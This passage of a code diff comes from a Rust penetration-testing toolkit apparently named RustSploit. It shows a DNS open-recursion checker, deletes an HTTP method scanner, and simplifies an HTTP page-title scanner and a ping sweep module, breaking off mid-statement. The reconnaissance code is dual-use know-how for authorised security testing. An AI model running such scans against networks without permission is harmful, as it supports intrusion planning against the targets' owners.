} else if recursion_available && rcode == ResponseCode::Refused {
println!(
"{}",
format!(
"[-] {} reports recursion available but refused the request (likely ACL protected).",
name
)
.yellow()
);
} else {
println!(
"{}",
format!(
"[-] {} does not appear to allow recursion (RA flag unset or query refused).",
name
)
.red()
);
}
}
fn parse_record_type(input: &str) -> Result<RecordType> {
match input.trim().to_uppercase().as_str() {
"A" => Ok(RecordType::A),
"AAAA" => Ok(RecordType::AAAA),
"ANY" => Ok(RecordType::ANY),
"DNSKEY" => Ok(RecordType::DNSKEY),
"TXT" => Ok(RecordType::TXT),
"MX" => Ok(RecordType::MX),
other => Err(anyhow!("Unsupported record type '{}'", other)),
}
}
async fn resolve_target(host: &str, port: u16) -> Result<(SocketAddr, String)> {
if let Ok(ip) = host.parse::<IpAddr>() {
let addr = SocketAddr::new(ip, port);
return Ok((addr, format_endpoint(host, port)));
}
let mut addrs_iter = (host, port)
.to_socket_addrs()
.with_context(|| format!("Unable to resolve '{}:{}'", host, port))?;
let addr = addrs_iter
.next()
.ok_or_else(|| anyhow!("No socket addresses resolved for '{}:{}'", host, port))?;
Ok((addr, addr.to_string()))
}
fn random_test_domain() -> String {
let mut rng = rand::rng();
let random_label: String = (0..12)
.map(|_| {
let n = rng.random_range(0..36);
if n < 10 {
(b'0' + n) as char
} else {
(b'a' + (n - 10)) as char
}
})
.collect();
format!("{}.rustsploit.test", random_label)
}
fn prompt_default(message: &str, default: &str) -> Result<String> {
print!("{} [{}]: ", message, default);
io::stdout().flush()?;
let mut buf = String::new();
io::stdin().read_line(&mut buf)?;
let trimmed = buf.trim();
if trimmed.is_empty() {
Ok(default.to_string())
} else if trimmed.len() > 255 {
Err(anyhow!("Input too long"))
} else {
Ok(trimmed.to_string())
}
}
fn prompt_port(message: &str, default: u16) -> Result<u16> {
loop {
let prompt = format!("{} [{}]: ", message, default);
print!("{}", prompt);
io::stdout().flush()?;
let mut buf = String::new();
io::stdin().read_line(&mut buf)?;
let trimmed = buf.trim();
if trimmed.is_empty() {
return Ok(default);
}
if let Ok(value) = trimmed.parse::<u16>() {
if value > 0 {
return Ok(value);
}
}
println!("Please provide a valid port between 1 and 65535.");
}
}
fn prompt_line(message: &str) -> Result<String> {
print!("{}", message);
io::stdout().flush()?;
let mut buf = String::new();
io::stdin().read_line(&mut buf)?;
let trimmed = buf.trim();
if trimmed.len() > 255 {
return Err(anyhow!("Input too long (max 255 characters)."));
}
Ok(trimmed.to_string())
}
fn prompt_yes_no(message: &str, default_yes: bool) -> Result<bool> {
let hint = if default_yes { "Y/n" } else { "y/N" };
loop {
let prompt = format!("{} [{}]: ", message, hint);
print!("{}", prompt);
io::stdout().flush()?;
let mut buf = String::new();
io::stdin().read_line(&mut buf)?;
let trimmed = buf.trim().to_lowercase();
match trimmed.as_str() {
"" => return Ok(default_yes),
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
"stop" => return Ok(false),
_ => println!("{}", "Please answer with 'y' or 'n'.".yellow()),
}
}
}
fn collect_targets(initial: &str) -> Result<Vec<TargetSpec>> {
let mut targets = Vec::new();
let mut seen: HashSet<String> = HashSet::new();
let trimmed_initial = initial.trim();
if !trimmed_initial.is_empty() {
let added = parse_targets_from_str(trimmed_initial, "cli", &mut seen, &mut targets);
if added == 0 && Path::new(trimmed_initial).is_file() {
println!(
"{}",
format!("[*] Loading targets from file '{}'", trimmed_initial).cyan()
);
match parse_targets_from_file(trimmed_initial, &mut seen, &mut targets) {
Ok(count) => {
if count == 0 {
println!("{}", " No valid targets found in file.".yellow());
} else {
println!(
"{}",
format!(
" Loaded {} target(s) from '{}'",
count, trimmed_initial
)
.green()
);
}
}
Err(err) => {
eprintln!(
"{}",
format!(
" Failed to read '{}': {}",
trimmed_initial, err
)
.red()
);
}
}
}
}
if prompt_yes_no(
"Add additional targets manually? (type 'stop' to finish)",
targets.is_empty(),
)? {
loop {
let entry = prompt_line("Target (IP/host[:port], 'stop' to finish): ")?;
if entry.is_empty() {
continue;
}
if entry.eq_ignore_ascii_case("stop") {
break;
}
add_target_token(&entry, "interactive", &mut seen, &mut targets);
}
}
if prompt_yes_no("Load targets from file?", false)? {
loop {
let path_input = prompt_line("Path to file ('stop' to finish): ")?;
if path_input.is_empty() {
continue;
}
if path_input.eq_ignore_ascii_case("stop") {
break;
}
match parse_targets_from_file(&path_input, &mut seen, &mut targets) {
Ok(count) => {
if count == 0 {
println!(
"{}",
format!(" No valid targets parsed from '{}'", path_input).yellow()
);
} else {
println!(
"{}",
format!(
" Loaded {} target(s) from '{}'",
count, path_input
)
.green()
);
}
}
Err(err) => eprintln!(
"{}",
format!(" Failed to read '{}': {}", path_input, err).red()
),
}
}
}
Ok(targets)
}
fn parse_targets_from_str(
input: &str,
context: &str,
seen: &mut HashSet<String>,
targets: &mut Vec<TargetSpec>,
) -> usize {
let mut added = 0usize;
for token in input
.split(|c: char| c == ',' || c.is_ascii_whitespace())
.filter_map(|segment| {
let trimmed = segment.trim();
if trimmed.is_empty() {
None
} else {
Some(trimmed)
}
})
{
if add_target_token(token, context, seen, targets) {
added += 1;
}
}
added
}
fn parse_targets_from_file(
path: &str,
seen: &mut HashSet<String>,
targets: &mut Vec<TargetSpec>,
) -> Result<usize> {
let file = File::open(path)
.with_context(|| format!("Failed to open target file '{}'", path))?;
let reader = BufReader::new(file);
let mut added = 0usize;
for (idx, line) in reader.lines().enumerate() {
let line = line?;
let content = line.split('#').next().unwrap_or("").trim();
if content.is_empty() {
continue;
}
let ctx = format!("file:{}:{}", path, idx + 1);
added += parse_targets_from_str(content, &ctx, seen, targets);
}
Ok(added)
}
fn add_target_token(
token: &str,
context: &str,
seen: &mut HashSet<String>,
targets: &mut Vec<TargetSpec>,
) -> bool {
if token.eq_ignore_ascii_case("stop") {
return false;
}
match parse_target_spec(token) {
Ok(spec) => {
let key = format!("{}:{}", spec.host, spec.port.unwrap_or(0));
if seen.insert(key) {
println!(
"{}",
format!(" [{}] Added target {}", context, spec.input).cyan()
);
targets.push(spec);
true
} else {
println!(
"{}",
format!(" [{}] Duplicate target '{}' skipped", context, token).dimmed()
);
false
}
}
Err(err) => {
eprintln!(
"{}",
format!(
" [{}] Skipping invalid target '{}': {}",
context, token, err
)
.yellow()
);
false
}
}
}
fn parse_target_spec(token: &str) -> Result<TargetSpec> {
let sanitized = sanitize_target_input(token)?;
let (host, port) = split_host_port(&sanitized)?;
Ok(TargetSpec {
input: sanitized.clone(),
host: host.to_lowercase(),
port,
})
}
fn sanitize_target_input(input: &str) -> Result<String> {
let trimmed = input.trim();
if trimmed.is_empty() {
return Err(anyhow!("Target cannot be empty"));
}
if trimmed.len() > 255 {
return Err(anyhow!(
"Target '{}' is too long (maximum 255 characters)",
trimmed
));
}
if !trimmed
.chars()
.all(|c| c.is_ascii_alphanumeric() || ".-_:[]".contains(c))
{
return Err(anyhow!(
"Target '{}' contains invalid characters. Allowed: A-Z, 0-9, '.', '-', '_', ':', '[', ']'",
trimmed
));
}
Ok(trimmed.to_string())
}
fn split_host_port(value: &str) -> Result<(String, Option<u16>)> {
if value.is_empty() {
return Err(anyhow!("Target cannot be empty"));
}
if let Ok(addr) = value.parse::<SocketAddr>() {
return Ok((addr.ip().to_string(), Some(addr.port())));
}
if value.starts_with('[') {
let end = value
.find(']')
.ok_or_else(|| anyhow!("Malformed IPv6 target '{}': missing ']'", value))?;
let host = value[1..end].to_string();
if value.len() == end + 1 {
return Ok((host, None));
}
if !value[end + 1..].starts_with(':') {
return Err(anyhow!(
"Malformed IPv6 target '{}': expected ':' after ']'",
value
));
}
let port_part = &value[end + 2..];
if port_part.is_empty() {
return Err(anyhow!("Missing port after IPv6 address in '{}'", value));
}
let port = port_part
.parse::<u16>()
.with_context(|| format!("Invalid port '{}' in target '{}'", port_part, value))?;
if port == 0 {
return Err(anyhow!("Port must be between 1 and 65535"));
}
return Ok((host, Some(port)));
}
if value.ends_with(':') {
return Err(anyhow!(
"Invalid target '{}': trailing ':' without port",
value
));
}
let colon_count = value.matches(':').count();
if colon_count == 1 {
let idx = value.rfind(':').unwrap();
let host_part = &value[..idx];
let port_part = &value[idx + 1..];
if host_part.is_empty() {
return Err(anyhow!("Host cannot be empty in target '{}'", value));
}
if !port_part.chars().all(|c| c.is_ascii_digit()) {
return Err(anyhow!(
"Invalid port '{}' in target '{}'",
port_part,
value
));
}
let port = port_part
.parse::<u16>()
.with_context(|| format!("Invalid port '{}' in target '{}'", port_part, value))?;
if port == 0 {
return Err(anyhow!("Port must be between 1 and 65535"));
}
return Ok((host_part.to_string(), Some(port)));
}
if colon_count >= 2 {
let ip = value.parse::<IpAddr>().with_context(|| {
format!(
"Invalid IPv6 address '{}' (use [addr]:port for scoped ports)",
value
)
})?;
return Ok((ip.to_string(), None));
}
Ok((value.to_string(), None))
}
fn format_endpoint(host: &str, port: u16) -> String {
match host.parse::<IpAddr>() {
Ok(IpAddr::V6(_)) => format!("[{}]:{}", host, port),
_ => format!("{}:{}", host, port),
}
}
fn validate_domain_input(input: &str) -> Result<String> {
let trimmed = input.trim();
if trimmed.is_empty() {
return Err(anyhow!("Domain cannot be empty"));
}
if trimmed.len() > 253 {
return Err(anyhow!(
"Domain '{}' is too long (maximum 253 characters)",
trimmed
));
}
let without_dot = trimmed.trim_end_matches('.');
if without_dot.is_empty() {
return Err(anyhow!("Domain cannot be empty"));
}
if without_dot
.chars()
.any(|c| !(c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_'))
{
return Err(anyhow!(
"Domain '{}' contains invalid characters. Allowed: A-Z, 0-9, '-', '_', '.'",
trimmed
));
}
Ok(without_dot.to_lowercase())
}
-377
View File
@@ -1,377 +0,0 @@
use anyhow::{anyhow, Context, Result};
use chrono::Utc;
use reqwest::{Client, Method, StatusCode, Url};
use std::collections::HashSet;
use std::fs;
use std::io::{self, Write};
use std::time::Duration;
const METHODS: &[&str] = &[
"GET",
"POST",
"HEAD",
"OPTIONS",
"PUT",
"DELETE",
"PATCH",
"TRACE",
"CONNECT",
];
struct MethodResult {
method: &'static str,
status: Option<StatusCode>,
ok: bool,
error: Option<String>,
duration_ms: u128,
}
struct TargetResult {
target: String,
results: Vec<MethodResult>,
}
pub async fn run(initial_target: &str) -> Result<()> {
banner();
let mut targets = collect_initial_targets(initial_target);
let additional = prompt("Enter additional comma-separated targets (optional): ")?;
if !additional.is_empty() {
targets.extend(split_targets(&additional));
}
let file_path = prompt("Path to file with targets (optional): ")?;
if !file_path.is_empty() {
let file_targets = load_targets_from_file(&file_path)?;
targets.extend(file_targets);
}
let default_scheme_input = prompt("Preferred scheme (http/https, default https): ")?;
let default_scheme = match default_scheme_input.to_lowercase().as_str() {
"http" => "http",
_ => "https",
};
let use_ports = prompt_bool(
"Test via specific ports (port tunneling)? (yes/no, default no): ",
false,
)?;
let ports = if use_ports {
prompt_ports()?
} else {
Vec::new()
};
let timeout_input = prompt("Request timeout in seconds (default 10): ")?;
let timeout_secs: u64 = timeout_input
.parse()
.ok()
.filter(|val| *val > 0)
.unwrap_or(10);
let verbose = prompt_bool("Enable verbose output? (yes/no, default no): ", false)?;
let save_output = prompt_bool("Save results to file? (yes/no, default yes): ", true)?;
let mut normalized = normalize_targets(targets, default_scheme);
if !ports.is_empty() {
let expanded = expand_targets_with_ports(&normalized, &ports);
if expanded.is_empty() {
println!("[!] No valid port combinations derived; continuing without port tunneling.");
} else {
normalized = expanded;
}
}
if normalized.is_empty() {
return Err(anyhow!("No valid targets provided"));
}
normalized.sort();
let client = Client::builder()
.user_agent("RustSploit-HTTP-Method-Scanner/1.0")
.timeout(Duration::from_secs(timeout_secs))
.redirect(reqwest::redirect::Policy::limited(5))
.build()
.context("Failed to build HTTP client")?;
let mut all_results = Vec::new();
for target in &normalized {
println!("\n=== Target: {} ===", target);
let mut method_results = Vec::new();
for &method_name in METHODS {
let method = Method::from_bytes(method_name.as_bytes()).unwrap_or(Method::GET);
let body = match method_name {
"POST" | "PUT" | "PATCH" => Some("RustSploit HTTP method scanner test".to_string()),
_ => None,
};
let start = std::time::Instant::now();
let response = if let Some(ref payload) = body {
client
.request(method.clone(), target)
.body(payload.clone())
.send()
.await
} else {
client.request(method.clone(), target).send().await
};
let elapsed = start.elapsed();
match response {
Ok(resp) => {
let status = resp.status();
let ok = status.is_success();
if verbose {
println!(
" [{}] {} -> {} ({:.2?})",
method_name,
target,
status,
elapsed
);
} else {
println!(" [{}] {}", method_name, status);
}
method_results.push(MethodResult {
method: method_name,
status: Some(status),
ok,
error: None,
duration_ms: elapsed.as_millis(),
});
}
Err(err) => {
if verbose {
println!(
" [{}] {} -> error: {} ({:.2?})",
method_name,
target,
err,
elapsed
);
} else {
println!(" [{}] error: {}", method_name, err);
}
method_results.push(MethodResult {
method: method_name,
status: None,
ok: false,
error: Some(err.to_string()),
duration_ms: elapsed.as_millis(),
});
}
}
}
all_results.push(TargetResult {
target: target.clone(),
results: method_results,
});
}
if save_output {
let default_name = format!(
"http_method_scan_{}.txt",
Utc::now().format("%Y%m%d_%H%M%S")
);
let output_path = prompt_with_default(
"Enter output file path (press Enter for default): ",
&default_name,
)?;
write_report(&output_path, &all_results)?;
println!("[*] Results saved to {}", output_path);
}
println!("\n[*] Scan complete.");
Ok(())
}
fn banner() {
println!(
"{}",
r#"
HTTP METHOD CAPABILITY SCANNER
Checks support for common verbs
"#
);
}
fn collect_initial_targets(initial_target: &str) -> Vec<String> {
let mut targets = Vec::new();
let trimmed = initial_target.trim();
if !trimmed.is_empty() && trimmed != "http_method_scanner" {
targets.extend(split_targets(trimmed));
}
targets
}
fn split_targets(input: &str) -> Vec<String> {
input
.split(|c| c == ',' || c == '\n' || c == ';')
.map(|item| item.trim().trim_end_matches('/').to_string())
.filter(|item| !item.is_empty())
.collect()
}
fn load_targets_from_file(path: &str) -> Result<Vec<String>> {
let data = fs::read_to_string(path)
.with_context(|| format!("Failed to read target file: {}", path))?;
Ok(split_targets(&data))
}
fn normalize_targets(targets: Vec<String>, default_scheme: &str) -> Vec<String> {
let mut unique = HashSet::new();
let mut normalized = Vec::new();
for raw in targets {
let target = raw.trim();
if target.is_empty() {
continue;
}
let formatted = if target.starts_with("http://")
|| target.starts_with("https://")
|| target.contains("://")
{
target.to_string()
} else {
format!("{}://{}", default_scheme, target)
};
if unique.insert(formatted.clone()) {
normalized.push(formatted);
}
}
normalized
}
fn expand_targets_with_ports(targets: &[String], ports: &[u16]) -> Vec<String> {
let mut expanded = Vec::new();
let mut seen = HashSet::new();
for target in targets {
if let Ok(url) = Url::parse(target) {
for port in ports {
let mut candidate = url.clone();
if candidate.set_port(Some(*port)).is_ok() {
let final_url = candidate.to_string();
if seen.insert(final_url.clone()) {
expanded.push(final_url);
}
}
}
} else {
for port in ports {
let final_url = format!("{}:{}", target, port);
if seen.insert(final_url.clone()) {
expanded.push(final_url);
}
}
}
}
expanded
}
fn prompt(message: &str) -> Result<String> {
print!("{}", message);
io::stdout().flush().context("Failed to flush stdout")?;
let mut input = String::new();
io::stdin()
.read_line(&mut input)
.context("Failed to read user input")?;
Ok(input.trim().to_string())
}
fn prompt_bool(message: &str, default: bool) -> Result<bool> {
let default_text = if default { "yes" } else { "no" };
let input = prompt(&format!("{}", message))?;
if input.is_empty() {
return Ok(default);
}
match input.to_lowercase().as_str() {
"y" | "yes" | "true" => Ok(true),
"n" | "no" | "false" => Ok(false),
_ => {
println!("[!] Invalid input, using default ({})", default_text);
Ok(default)
}
}
}
fn prompt_with_default(message: &str, default: &str) -> Result<String> {
let input = prompt(message)?;
if input.is_empty() {
Ok(default.to_string())
} else {
Ok(input)
}
}
fn prompt_ports() -> Result<Vec<u16>> {
let input = prompt(
"Enter port(s) to tunnel through (comma-separated, e.g., 80,8080; leave blank to skip): ",
)?;
if input.is_empty() {
println!("[!] No ports provided; skipping port tunneling.");
return Ok(Vec::new());
}
let mut ports = Vec::new();
let mut seen = HashSet::new();
for part in input.split(|c| c == ',' || c == ';' || c == ' ') {
let trimmed = part.trim();
if trimmed.is_empty() {
continue;
}
match trimmed.parse::<u16>() {
Ok(port) => {
if seen.insert(port) {
ports.push(port);
}
}
Err(_) => println!("[!] Skipping invalid port '{}'.", trimmed),
}
}
if ports.is_empty() {
println!("[!] No valid ports parsed; skipping port tunneling.");
}
Ok(ports)
}
fn write_report(path: &str, results: &[TargetResult]) -> Result<()> {
let mut lines = Vec::new();
lines.push("HTTP Method Scanner Report".to_string());
lines.push(format!("Generated at: {}", Utc::now()));
lines.push(String::new());
for target in results {
lines.push(format!("Target: {}", target.target));
for method in &target.results {
if let Some(status) = method.status {
lines.push(format!(
" - {:<7} status: {:<5} success: {:<5} time: {} ms",
method.method,
status.as_u16(),
method.ok,
method.duration_ms
));
} else if let Some(ref error) = method.error {
lines.push(format!(
" - {:<7} error: {} time: {} ms",
method.method,
error,
method.duration_ms
));
}
}
lines.push(String::new());
}
fs::write(path, lines.join("\n")).with_context(|| format!("Failed to write report to {}", path))
}
+16 -356
View File
@@ -1,373 +1,33 @@
use anyhow::{anyhow, Context, Result};
use chrono::Utc;
use anyhow::{Result, Context};
use regex::Regex;
use reqwest::{Client, StatusCode, Url};
use std::collections::HashSet;
use std::fs;
use std::io::{self, Write};
use std::time::Duration;
use reqwest::Client;
pub async fn run(initial_target: &str) -> Result<()> {
banner();
let mut targets = collect_initial_targets(initial_target);
let additional = prompt("Enter additional comma-separated targets (optional): ")?;
if !additional.is_empty() {
targets.extend(split_targets(&additional));
}
let file_path = prompt("Path to file with targets (optional): ")?;
if !file_path.is_empty() {
let file_targets = load_targets_from_file(&file_path)?;
targets.extend(file_targets);
}
let check_http = prompt_bool("Check HTTP (http://)? (yes/no, default yes): ", true)?;
let check_https = prompt_bool("Check HTTPS (https://)? (yes/no, default yes): ", true)?;
if !check_http && !check_https {
println!("[!] Neither HTTP nor HTTPS selected; nothing to scan.");
return Ok(());
}
let use_ports = prompt_bool(
"Test via specific ports (port tunneling)? (yes/no, default no): ",
false,
)?;
let ports = if use_ports {
prompt_ports()?
} else {
Vec::new()
};
let timeout_secs = prompt_timeout()?;
let save_output = prompt_bool("Save results to file? (yes/no, default yes): ", true)?;
let verbose = prompt_bool("Enable verbose output? (yes/no, default no): ", false)?;
let mut normalized = normalize_targets(targets, check_http, check_https);
if !ports.is_empty() {
let expanded = expand_targets_with_ports(&normalized, &ports);
if expanded.is_empty() {
println!("[!] No valid port combinations derived; continuing without port tunneling.");
} else {
normalized = expanded;
}
}
if normalized.is_empty() {
return Err(anyhow!("No valid targets provided"));
}
normalized.sort();
pub async fn run(target: &str) -> Result<()> {
run_interactive(target).await
}
pub async fn run_interactive(target: &str) -> Result<()> {
let client = Client::builder()
.user_agent("RustSploit-HTTP-Title-Scanner/1.0")
.timeout(Duration::from_secs(timeout_secs))
.redirect(reqwest::redirect::Policy::limited(5))
.build()
.context("Failed to build HTTP client")?;
let title_re = Regex::new(r"(?is)<title\b[^>]*>(.*?)</title>")?;
let mut all_results = Vec::new();
for url in &normalized {
match fetch_title(&client, url, &title_re).await {
Ok(result) => {
if let Some(title) = &result.title {
println!("[+] {} -> {}" , url, title);
} else if let Some(status) = result.status {
println!("[+] {} -> <no title> (status: {})", url, status);
let title_re = Regex::new(r"(?i)<title>(.*?)</title>")?;
for scheme in ["http", "https"] {
let url = format!("{}://{}", scheme, target);
match client.get(&url).send().await {
Ok(resp) => {
let text = resp.text().await.unwrap_or_default();
if let Some(cap) = title_re.captures(&text) {
println!("[+] {} -> {}", url, cap.get(1).unwrap().as_str());
} else {
println!("[+] {} -> <no title>", url);
}
if verbose {
if let Some(status) = result.status {
println!(" Status: {}", status);
}
println!(" Duration: {} ms", result.duration_ms);
}
all_results.push(result);
}
Err(err) => {
println!("[-] {} -> error: {}", url, err);
all_results.push(TitleResult {
url: url.clone(),
status: None,
title: None,
error: Some(err.to_string()),
duration_ms: 0,
});
Err(e) => {
println!("[-] Failed {}: {}", url, e);
}
}
}
if save_output {
let default_name = format!(
"http_title_scan_{}.txt",
Utc::now().format("%Y%m%d_%H%M%S")
);
let output_path = prompt_with_default(
"Enter output file path (press Enter for default): ",
&default_name,
)?;
write_report(&output_path, &all_results)?;
println!("[*] Results saved to {}", output_path);
}
println!("\n[*] Scan complete.");
Ok(())
}
struct TitleResult {
url: String,
status: Option<StatusCode>,
title: Option<String>,
error: Option<String>,
duration_ms: u128,
}
impl TitleResult {
fn display_title(&self) -> String {
match (&self.title, &self.error) {
(Some(title), _) => title.clone(),
(None, Some(err)) => format!("error: {}", err),
(None, None) => "<no title>".to_string(),
}
}
}
async fn fetch_title(client: &Client, url: &str, title_re: &Regex) -> Result<TitleResult> {
let start = std::time::Instant::now();
let response = client.get(url).send().await.context("Request failed")?;
let status = response.status();
let text = response.text().await.unwrap_or_default();
let title = title_re
.captures(&text)
.and_then(|cap| cap.get(1))
.map(|m| sanitize_title(m.as_str()));
let duration = start.elapsed().as_millis();
Ok(TitleResult {
url: url.to_string(),
status: Some(status),
title,
error: None,
duration_ms: duration,
})
}
fn sanitize_title(raw: &str) -> String {
raw
.lines()
.map(|line| line.trim())
.filter(|line| !line.is_empty())
.collect::<Vec<_>>()
.join(" ")
.chars()
.take(200)
.collect()
}
fn collect_initial_targets(initial_target: &str) -> Vec<String> {
let mut targets = Vec::new();
let trimmed = initial_target.trim();
if !trimmed.is_empty() && trimmed != "http_title_scanner" {
targets.extend(split_targets(trimmed));
}
targets
}
fn split_targets(input: &str) -> Vec<String> {
input
.split(|c| c == ',' || c == '\n' || c == ';')
.map(|item| item.trim().trim_end_matches('/').to_string())
.filter(|item| !item.is_empty())
.collect()
}
fn load_targets_from_file(path: &str) -> Result<Vec<String>> {
let data = fs::read_to_string(path)
.with_context(|| format!("Failed to read target file: {}", path))?;
Ok(split_targets(&data))
}
fn normalize_targets(targets: Vec<String>, check_http: bool, check_https: bool) -> Vec<String> {
let mut unique = HashSet::new();
let mut normalized = Vec::new();
for raw in targets {
let target = raw.trim();
if target.is_empty() {
continue;
}
if target.starts_with("http://") || target.starts_with("https://") {
if unique.insert(target.to_string()) {
normalized.push(target.to_string());
}
continue;
}
if check_https {
let https = format!("https://{}", target);
if unique.insert(https.clone()) {
normalized.push(https);
}
}
if check_http {
let http = format!("http://{}", target);
if unique.insert(http.clone()) {
normalized.push(http);
}
}
}
normalized
}
fn expand_targets_with_ports(targets: &[String], ports: &[u16]) -> Vec<String> {
let mut expanded = Vec::new();
let mut seen = HashSet::new();
for target in targets {
if let Ok(url) = Url::parse(target) {
for port in ports {
let mut candidate = url.clone();
if candidate.set_port(Some(*port)).is_ok() {
let final_url = candidate.to_string();
if seen.insert(final_url.clone()) {
expanded.push(final_url);
}
}
}
} else {
for port in ports {
let final_url = format!("{}:{}", target, port);
if seen.insert(final_url.clone()) {
expanded.push(final_url);
}
}
}
}
expanded
}
fn prompt(message: &str) -> Result<String> {
print!("{}", message);
io::stdout().flush().context("Failed to flush stdout")?;
let mut input = String::new();
io::stdin()
.read_line(&mut input)
.context("Failed to read user input")?;
Ok(input.trim().to_string())
}
fn prompt_bool(message: &str, default: bool) -> Result<bool> {
let default_text = if default { "yes" } else { "no" };
let input = prompt(message)?;
if input.is_empty() {
return Ok(default);
}
match input.to_lowercase().as_str() {
"y" | "yes" | "true" => Ok(true),
"n" | "no" | "false" => Ok(false),
_ => {
println!("[!] Invalid input, using default ({})", default_text);
Ok(default)
}
}
}
fn prompt_with_default(message: &str, default: &str) -> Result<String> {
let input = prompt(message)?;
if input.is_empty() {
Ok(default.to_string())
} else {
Ok(input)
}
}
fn prompt_timeout() -> Result<u64> {
let input = prompt("Request timeout in seconds (default 10): ")?;
if input.is_empty() {
return Ok(10);
}
match input.parse::<u64>() {
Ok(val) if val > 0 => Ok(val),
_ => {
println!("[!] Invalid timeout, using default (10s)");
Ok(10)
}
}
}
fn prompt_ports() -> Result<Vec<u16>> {
let input = prompt(
"Enter port(s) to tunnel through (comma-separated, e.g., 80,8080; leave blank to skip): ",
)?;
if input.is_empty() {
println!("[!] No ports provided; skipping port tunneling.");
return Ok(Vec::new());
}
let mut ports = Vec::new();
let mut seen = HashSet::new();
for part in input.split(|c| c == ',' || c == ';' || c == ' ') {
let trimmed = part.trim();
if trimmed.is_empty() {
continue;
}
match trimmed.parse::<u16>() {
Ok(port) => {
if seen.insert(port) {
ports.push(port);
}
}
Err(_) => println!("[!] Skipping invalid port '{}'.", trimmed),
}
}
if ports.is_empty() {
println!("[!] No valid ports parsed; skipping port tunneling.");
}
Ok(ports)
}
fn write_report(path: &str, results: &[TitleResult]) -> Result<()> {
let mut lines = Vec::new();
lines.push("HTTP Title Scanner Report".to_string());
lines.push(format!("Generated at: {}", Utc::now()));
lines.push(String::new());
for result in results {
let status_text = result
.status
.map(|s| s.as_u16().to_string())
.unwrap_or_else(|| "n/a".to_string());
lines.push(format!(
"{} | status: {:<5} | title: {}",
result.url,
status_text,
result.display_title()
));
if result.duration_ms > 0 {
lines.push(format!(" duration: {} ms", result.duration_ms));
}
}
fs::write(path, lines.join("\n")).with_context(|| format!("Failed to write report to {}", path))
}
fn banner() {
println!(
"{}",
r#"
HTTP TITLE SCANNER (RustSploit)
Enumerate page titles over HTTP/HTTPS endpoints
"#
);
}
-2
View File
@@ -4,5 +4,3 @@ pub mod port_scanner;
pub mod stalkroute_full_traceroute;
pub mod http_title_scanner;
pub mod ping_sweep;
pub mod http_method_scanner;
pub mod dns_recursion;
+59 -584
View File
@@ -1,606 +1,81 @@
use anyhow::{anyhow, Context, Result};
use colored::*;
use anyhow::{Result, Context};
use ipnet::IpNet;
use std::{
collections::HashSet,
fs::File,
io::{self, BufRead, BufReader, Write},
net::{IpAddr, SocketAddr},
sync::{
atomic::{AtomicUsize, Ordering},
Arc,
},
use std::net::IpAddr;
use std::sync::Arc;
use tokio::{
process::Command,
sync::Semaphore,
time::{timeout, Duration},
};
use tokio::{net::TcpStream, process::Command, sync::Semaphore, time::Duration};
use std::io::{self, Write};
#[derive(Clone, Debug)]
struct PingConfig {
targets: Vec<IpNet>,
methods: Vec<PingMethod>,
concurrency: usize,
timeout_secs: u64,
verbose: bool,
/// Main entry point for the RouterSploit auto-dispatch system
pub async fn run(target: &str) -> Result<()> {
let cidr = prompt_for_cidr(target).await?;
execute_ping_sweep(&cidr).await
}
#[derive(Clone, Debug)]
enum PingMethod {
Icmp,
Tcp { ports: Vec<u16> },
}
impl PingMethod {
fn describe(&self) -> String {
match self {
PingMethod::Icmp => "ICMP".to_string(),
PingMethod::Tcp { ports } => {
if ports.len() == 1 {
format!("TCP/{}", ports[0])
} else {
format!(
"TCP [{}]",
ports
.iter()
.map(u16::to_string)
.collect::<Vec<_>>()
.join(",")
)
}
/// Prompt for a valid CIDR until received
async fn prompt_for_cidr(initial: &str) -> Result<String> {
// // Start with any provided value
let mut input = initial.trim().to_string();
loop {
// // If empty, ask user
if input.is_empty() {
print!("Enter target (CIDR, e.g., 192.168.1.0/24): ");
io::stdout().flush().ok();
input.clear();
io::stdin().read_line(&mut input)?;
input = input.trim().to_string();
}
// // Try to parse as CIDR
match input.parse::<IpNet>() {
Ok(_) => return Ok(input),
Err(_) => {
eprintln!("[!] Module failed: Use CIDR notation like 192.168.1.0/24\n\nCaused by:\n invalid IP address syntax");
input.clear();
continue;
}
}
}
fn label(&self) -> &'static str {
match self {
PingMethod::Icmp => "ICMP",
PingMethod::Tcp { .. } => "TCP",
}
}
async fn probe(&self, ip: &IpAddr, timeout: Duration) -> Result<Vec<String>> {
match self {
PingMethod::Icmp => icmp_probe(ip, timeout).await,
PingMethod::Tcp { ports } => tcp_probe(ip, ports, timeout).await,
}
}
}
/// Main entry point triggered via the dispatcher
pub async fn run(initial_target: &str) -> Result<()> {
let config = gather_configuration(initial_target)?;
execute_ping_sweep(&config).await
}
fn parse_target(input: &str) -> Result<IpNet> {
if let Ok(net) = input.parse::<IpNet>() {
return Ok(net);
}
if let Ok(ip) = input.parse::<IpAddr>() {
let prefix = match ip {
IpAddr::V4(_) => 32,
IpAddr::V6(_) => 128,
};
let cidr = format!("{}/{}", ip, prefix);
let net = cidr
.parse::<IpNet>()
.context("failed to convert host to /32 or /128 network")?;
return Ok(net);
}
Err(anyhow!("Invalid target '{}'. Use IP or IP/CIDR.", input))
}
fn gather_configuration(initial: &str) -> Result<PingConfig> {
println!("{}", "=== Ping Sweep Configuration ===".bold());
let mut nets: Vec<IpNet> = Vec::new();
let initial_trimmed = initial.trim();
if !initial_trimmed.is_empty() {
match parse_target(initial_trimmed) {
Ok(net) => {
println!(
"{}",
format!("[*] Loaded initial target {}", net).green()
);
nets.push(net);
}
Err(e) => {
eprintln!(
"{}",
format!(" Initial target '{}' skipped: {}", initial_trimmed, e)
.yellow()
);
}
}
}
if prompt_yes_no("Add additional targets manually?", false)? {
loop {
let entry = prompt_line(
"Enter target (IP or CIDR, leave blank to stop): ",
true,
)?;
if entry.is_empty() {
break;
}
match parse_target(&entry) {
Ok(net) => {
println!("{}", format!(" + {}", net).cyan());
nets.push(net);
}
Err(e) => {
eprintln!("{}", format!(" ! {}", e).red());
}
}
}
}
if prompt_yes_no("Load targets from file?", false)? {
let path = prompt_line("Path to file: ", false)?;
let file_targets = load_targets_from_file(&path)?;
if file_targets.is_empty() {
println!("{}", " No targets parsed from file.".yellow());
} else {
println!(
"{}",
format!(
" Loaded {} targets from '{}'",
file_targets.len(),
path
)
.green()
);
nets.extend(file_targets);
}
}
if nets.is_empty() {
return Err(anyhow!(
"No valid targets supplied. Provide at least one IP or subnet."
));
}
// Deduplicate targets
let mut unique: HashSet<IpNet> = HashSet::new();
for net in nets {
unique.insert(net);
}
let targets: Vec<IpNet> = unique.into_iter().collect();
let timeout_secs =
